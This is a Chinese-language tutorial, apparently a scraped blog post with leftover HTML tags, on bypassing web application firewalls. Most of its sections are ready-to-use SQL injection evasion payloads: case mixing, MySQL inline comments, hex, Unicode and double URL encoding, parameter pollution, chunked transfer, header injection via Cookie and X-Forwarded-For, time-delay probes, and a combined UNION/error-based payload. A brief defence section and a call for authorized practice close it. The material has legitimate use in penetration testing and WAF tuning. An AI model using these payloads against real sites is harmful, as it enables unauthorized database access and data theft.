Bypass WAF 技术详解与实战思路<\/h1>

前言：绕过WAF的核心思想<\/h2>

绕过WAF（Web应用防火墙）的关键在于理解WAF的工作原理而非简单套用现成方法。WAF通常基于规则匹配和异常检测，绕过它们的核心思路是：<\/p>

变形攻击载荷<\/strong>：使攻击字符串不被规则匹配<\/li>
利用协议特性<\/strong>：HTTP协议和中间件解析的差异<\/li>
混淆技术<\/strong>：使攻击代码看起来无害<\/li>

逻辑绕过<\/strong>：利用WAF检测逻辑的盲区<\/li> <\/ol>
一、基础绕过技术<\/h2>
1. 大小写混合绕过<\/h3>
SeLeCt<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> <\/span><\/span><\/code><\/pre> 原理：部分WAF规则只匹配全小写或全大写的敏感词<\/li> 变体：随机大小写组合效果更佳<\/li> <\/ul> 2. 内联注释绕过<\/h3> \/*!SELECT*\/<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> <\/span><\/span><\/code><\/pre> MySQL特性：\/*!...*\/<\/code>中的内容会被MySQL执行<\/li> 可嵌套使用：SEL\/*xxx*\/ECT<\/code><\/li> <\/ul> 3. 等价替换技术<\/h3> 1<\/span> AND<\/span> 1<\/span>=<\/span>1<\/span> →<\/span> 1<\/span> &&<\/span> 1<\/span>=<\/span>1<\/span> <\/span><\/span>1<\/span> OR<\/span> 1<\/span>=<\/span>1<\/span> →<\/span> 1<\/span> ||<\/span> 1<\/span>=<\/span>1<\/span> <\/span><\/span><\/code><\/pre> 注意不同数据库的运算符差异<\/li> <\/ul> 4. 空白符变异<\/h3> SELECT<\/span>\/**\/<\/span>*<\/span>\/**\/<\/span>FROM<\/span>\/**\/<\/span>users <\/span><\/span><\/code><\/pre> 有效空白符：普通空格、制表符、换行符、注释符<\/li> 特殊空白符：%09<\/code>(tab)、%0A<\/code>(换行)、%0D<\/code>(回车)、%0B<\/code>(垂直tab)、%A0<\/code>(不换行空格)<\/li> <\/ul> 二、高级混淆技术<\/h2> 1. 十六进制编码<\/h3> SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> username=<\/span>0<\/span>x61646D696E <\/span><\/span><\/code><\/pre> 适用于字符串和整型<\/li> 可部分编码：SELECx54 * FROM users<\/code><\/li> <\/ul> 2. Unicode规范化绕过<\/h3> ＳＥＬＥＣＴ<\/span> *<\/span> FROM<\/span> users<\/span> --<\/span> 全角字符<\/span> <\/span><\/span>SEL<\/span>%<\/span>E1<\/span>%<\/span>83<\/span>%<\/span>A5T<\/span> *<\/span> FROM<\/span> users<\/span> --<\/span> Unicode编码<\/span> <\/span><\/span><\/code><\/pre> 利用字符的多形式表示<\/li> <\/ul> 3. 注释分割法<\/h3> SEL\/*xxxxxx*\/<\/span>ECT\/*aaaaa*\/<\/span>user<\/span>\/*bbbbb*\/<\/span>name\/*ccccc*\/<\/span>FROM<\/span>\/*ddddd*\/<\/span>users <\/span><\/span><\/code><\/pre> 关键：注释内容无规律且长度可变<\/li> <\/ul> 4. 多重编码技术<\/h3> %<\/span>2527<\/span> --<\/span> 双重URL编码单引号<\/span> <\/span><\/span>%<\/span>25<\/span>%<\/span>36<\/span>%<\/span>31<\/span>%<\/span>25<\/span>%<\/span>36<\/span>%<\/span>34<\/span>%<\/span>25<\/span>%<\/span>36<\/span>%<\/span>64<\/span>%<\/span>25<\/span>%<\/span>36<\/span>%<\/span>39<\/span>%<\/span>25<\/span>%<\/span>36<\/span>%<\/span>65<\/span> --<\/span> admin的二次编码<\/span> <\/span><\/span><\/code><\/pre>三、协议层绕过<\/h2> 1. HTTP参数污染(HPP)<\/h3> ?id=1&id=SELECT * FROM users <\/code><\/pre> 不同服务器对重复参数的处理不同： Apache: 取最后一个<\/li> IIS: 取第一个<\/li> JSP: 拼接成数组<\/li> <\/ul> <\/li> <\/ul> 2. HTTP参数分块<\/h3> Transfer-Encoding: chunked POST数据使用分块编码传输 <\/code><\/pre> 3. 请求方式变异<\/h3> GET请求改为POST POST请求改为PUT\/DELETE Content-Type切换：application\/json → text\/xml <\/code><\/pre> 4. 边界符绕过<\/h3> filename="test.php .jpg" -- 利用解析差异 filename=test.p\x68p <\/code><\/pre> 四、数据库特性利用<\/h2> MySQL特有绕过<\/h3> SELECT<\/span>{<\/span>x 1<\/span>}<\/span>name{<\/span>x 2<\/span>}<\/span>FROM<\/span>{<\/span>x 3<\/span>}<\/span>users <\/span><\/span>SELECT<\/span>`<\/span>name`<\/span>FROM<\/span>`<\/span>users`<\/span> <\/span><\/span><\/code><\/pre>MSSQL特有绕过<\/h3> EXEC<\/span>('SELECT * FROM users'<\/span>) <\/span><\/span>DECLARE<\/span> @<\/span>q VARCHAR(100<\/span>);SET<\/span> @<\/span>q=<\/span>0<\/span>x73656C656374202A2066726F6D207573657273;EXEC<\/span>(@<\/span>q) <\/span><\/span><\/code><\/pre>Oracle特有绕过<\/h3> SELECT<\/span> CHR(65<\/span>)||<\/span>CHR(66<\/span>)||<\/span>CHR(67<\/span>) FROM<\/span> dual <\/span><\/span><\/code><\/pre>五、WAF逻辑盲区<\/h2> 1. 超长数据绕过<\/h3> id=<\/span>1<\/span> and<\/span> 1<\/span>=<\/span>1<\/span>xxxxxxxx...[1000<\/span>+<\/span>个字符<\/span>]...xxx <\/span><\/span><\/code><\/pre> 部分WAF对超长参数检测不完整<\/li> <\/ul> 2. 非常规参数位置<\/h3> Cookie: user=admin' AND 1=1-- X-Forwarded-For: 127.0.0.1' AND SLEEP(5)-- <\/code><\/pre> 3. 时间延迟探测<\/h3> ?<\/span>id=<\/span>1<\/span> AND<\/span> IF<\/span>(1<\/span>=<\/span>1<\/span>,SLEEP(5<\/span>),0<\/span>) <\/span><\/span>?<\/span>id=<\/span>1<\/span>;WAITFOR DELAY '0:0:5'<\/span>-- <\/span><\/span><\/span><\/code><\/pre>六、综合绕过思路<\/h2> 1. 多技术组合<\/h3> \/*!UNIon*\/<\/span> \/*!SeleCT*\/<\/span> 1<\/span>,2<\/span>,3<\/span>,CONCAT(CHAR(104<\/span>,101<\/span>,108<\/span>,108<\/span>,111<\/span>),\/*!77777FLOOR(RAND(0)*2)*\/<\/span>) <\/span><\/span><\/code><\/pre>2. 分阶段攻击<\/h3> 先探测WAF过滤规则<\/li> 确定被过滤的关键词<\/li> 设计绕过方案<\/li> 逐步验证<\/li> <\/ol> 3. 上下文感知绕过<\/h3> 根据返回错误信息调整payload<\/li> 观察WAF拦截日志（如有）<\/li> 利用网站正常功能作为掩护<\/li> <\/ul> 七、防御措施与检测<\/h2> WAF防御策略<\/h3> 规范化输入数据<\/li> 多层级检测（语法+语义）<\/li> 机器学习行为分析<\/li> 定期更新规则库<\/li> <\/ol> 检测WAF存在<\/h3> 1. 发送恶意请求观察响应 2. 测试各种边界情况 3. 分析HTTP头信息 4. 时间延迟探测 <\/code><\/pre> 结语<\/h2> 绕过WAF的核心在于理解系统如何解析你的输入<\/strong>而非死记硬背payload。每个WAF的实现和规则都不同，需要根据实际情况灵活调整策略。建议通过合法授权的方式练习这些技术，真正掌握Web安全防护的精髓。<\/p>